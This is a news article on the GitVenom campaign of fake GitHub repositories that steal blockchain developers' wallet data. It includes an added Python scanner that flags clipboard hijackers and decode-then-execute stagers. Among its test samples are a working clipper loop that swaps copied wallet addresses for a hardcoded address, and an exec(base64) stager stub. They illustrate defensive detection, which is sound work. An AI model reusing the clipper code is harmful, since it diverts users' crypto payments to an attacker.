- Hackers are using fake GitHub repositories to target blockchain developers
- The repositories look legitimate, which increases the chance that developers run the code
- The repositories contain malicious code that lets the attackers steal a developer's crypto wallet data
Crypto hackers are changing their tactics and are now targeting blockchain developers with fake GitHub repositories. According to Kaspersky's Securelist, the repositories resemble genuine ones but contain malicious code that enables the attackers to steal a developer's crypto wallet data and other information, such as browsing history. Some repositories contain clipboard-hijacking code (a "clipper"): when the developer copies a wallet address, the malware silently replaces it in the clipboard with an attacker-controlled address, so funds sent to the pasted address go to the attacker rather than the intended recipient.
Hundreds of Fake GitHub Repositories Created
Securelist disclosed that the fake GitHub repositories are part of the “GitVenom campaign” that has seen threat actors create “hundreds of repositories on GitHub that contain fake projects with malicious code.”
One such project, for example, claims to be a Telegram bot that interacts with Bitcoin wallets but includes malware that drains a developer’s wallet. Securelist noted that the fake repositories “were written in multiple programming languages” including Python, C, C++, JavaScript, and C#.
According to Securelist, some projects in the GitVenom campaign were published two years ago, and the researchers noted that "the infection vector is likely quite efficient." They also said they expect threat actors to continue using fake repositories, "possibly with small changes in" tactics, techniques, and procedures (TTPs).
The researchers advised developers to be careful when running third-party code: GitHub is used by millions of developers, which makes it hard to tell genuine repositories from malicious ones.
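As a concrete form of the "be careful with third-party code" advice, and to show what the clipboard-hijacking behaviour described above looks like in source, here is an added example of a heuristic pre-run audit for cloned Python projects. It is not Securelist's or Kaspersky's code and is not taken from any GitVenom repository: the indicator list, the clipboard module names, the address regexes and the three sample snippets are all constructed assumptions chosen for illustration. It parses the code with `ast` rather than running it, flags a clipper when clipboard access is combined with a hardcoded wallet address, and flags a stager when `exec()`/`eval()` is fed a decoded blob.

```python
"""Heuristic pre-run audit of untrusted Python source for two behaviours the
article attributes to GitVenom projects: clipboard hijacking of wallet
addresses (a "clipper") and decode-then-execute payload stagers.

Added example; not Securelist/Kaspersky code and not from any GitVenom
repository. Indicators, module names and regexes are assumptions, and the
three samples at the bottom are constructed (they are parsed, never run).
"""
import ast
import pathlib
import re

# Simplified address shapes (assumption): legacy/bech32 Bitcoin, Ethereum.
BTC_ADDRESS = re.compile(r"bc1[a-z0-9]{25,59}|[13][a-km-zA-HJ-NP-Z1-9]{25,34}")
ETH_ADDRESS = re.compile(r"0x[a-fA-F0-9]{40}")
CLIPBOARD_MODULES = {"pyperclip", "clipboard", "win32clipboard"}  # assumption
EXEC_FUNCS = {"exec", "eval"}
DECODE_FUNCS = {"b64decode", "b32decode", "a85decode", "unhexlify", "decompress"}


def _call_name(call: ast.Call) -> str:
    """Dotted callee name, e.g. 'base64.b64decode'; '' for dynamic callees."""
    parts, node = [], call.func
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
    return ".".join(reversed(parts))


def _imported_modules(tree: ast.AST) -> set:
    """Top-level names of every imported module in the tree."""
    mods = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            mods.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            mods.add(node.module.split(".")[0])
    return mods


def _decodes_then_executes(call: ast.Call) -> bool:
    """True for exec()/eval() whose argument tree contains a decode call."""
    if _call_name(call) not in EXEC_FUNCS:
        return False
    return any(isinstance(sub, ast.Call) and sub is not call
               and _call_name(sub).rsplit(".", 1)[-1] in DECODE_FUNCS
               for sub in ast.walk(call))


def scan_source(source: str) -> dict:
    """Scan one Python source string and return indicators plus verdicts."""
    tree = ast.parse(source)
    calls = [n for n in ast.walk(tree) if isinstance(n, ast.Call)]
    # A string literal that *is* a wallet address is the attacker's replacement
    # address; matching whole literals avoids flagging address regexes.
    addresses = [n.value for n in ast.walk(tree)
                 if isinstance(n, ast.Constant) and isinstance(n.value, str)
                 and (BTC_ADDRESS.fullmatch(n.value) or ETH_ADDRESS.fullmatch(n.value))]
    clipboard = bool(_imported_modules(tree) & CLIPBOARD_MODULES) or any(
        "clipboard" in _call_name(c).lower() for c in calls)
    decode_exec = any(_decodes_then_executes(c) for c in calls)
    verdicts = []
    if clipboard and addresses:   # touches the clipboard AND ships an address
        verdicts.append("clipper")
    if decode_exec:
        verdicts.append("stager")
    return {"clipboard_access": clipboard, "hardcoded_addresses": addresses,
            "decode_then_exec": decode_exec, "verdicts": verdicts}


def scan_directory(root: str) -> dict:
    """Map each parseable .py file under root to its verdicts."""
    results = {}
    for path in pathlib.Path(root).rglob("*.py"):
        try:
            results[str(path)] = scan_source(path.read_text(errors="replace"))["verdicts"]
        except SyntaxError:
            continue  # not valid Python 3; out of scope for this heuristic
    return results


# Constructed samples (not real malware, not real addresses).
BENIGN_SAMPLE = """
import subprocess, pyperclip
sha = subprocess.check_output(["git", "rev-parse", "HEAD"]).decode().strip()
pyperclip.copy(sha)
"""
CLIPPER_SAMPLE = """
import re, time, pyperclip
ATTACKER_BTC = "1AbCdEfGhJkLmNoPqRsTuVwXyZ23456789a"
ATTACKER_ETH = "0xdeadbeefdeadbeefdeadbeefdeadbeefdeadbeef"
while True:
    text = pyperclip.paste()
    if re.fullmatch(r"[13][a-km-zA-HJ-NP-Z1-9]{25,34}", text) and text != ATTACKER_BTC:
        pyperclip.copy(ATTACKER_BTC)
    elif re.fullmatch(r"0x[a-fA-F0-9]{40}", text) and text != ATTACKER_ETH:
        pyperclip.copy(ATTACKER_ETH)
    time.sleep(0.5)
"""
STAGER_SAMPLE = """
import base64
PAYLOAD = "QUJD"
exec(base64.b64decode(PAYLOAD).decode())
"""

if __name__ == "__main__":
    for name, src in [("benign", BENIGN_SAMPLE), ("clipper", CLIPPER_SAMPLE),
                      ("stager", STAGER_SAMPLE)]:
        print(name, scan_source(src)["verdicts"])
```

The benign sample deliberately uses the clipboard too, so a single indicator never produces a verdict on its own; only the combination of clipboard access with an embedded wallet address marks a clipper. Run `scan_directory("path/to/clone")` on a freshly cloned project before executing anything in it. A clean result is no guarantee (obfuscation beyond base64, or code in another language, evades these heuristics), but a "clipper" or "stager" hit is reason to stop and read the code.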
Malicious Actors Expanding Their Methods
The fake GitHub repositories add to a growing list of methods used by malicious actors to steal crypto. In October last year, for example, the North Korean hacking group Lazarus used a fake NFT game to drain the wallets of unsuspecting gamers.
Threat actors are also posing as inexperienced crypto users and publicly sharing their wallets' seed phrases to lure victims.
With hackers now going after crypto developers, the number of victims may increase, since some developers may unknowingly incorporate the malicious code into their own projects.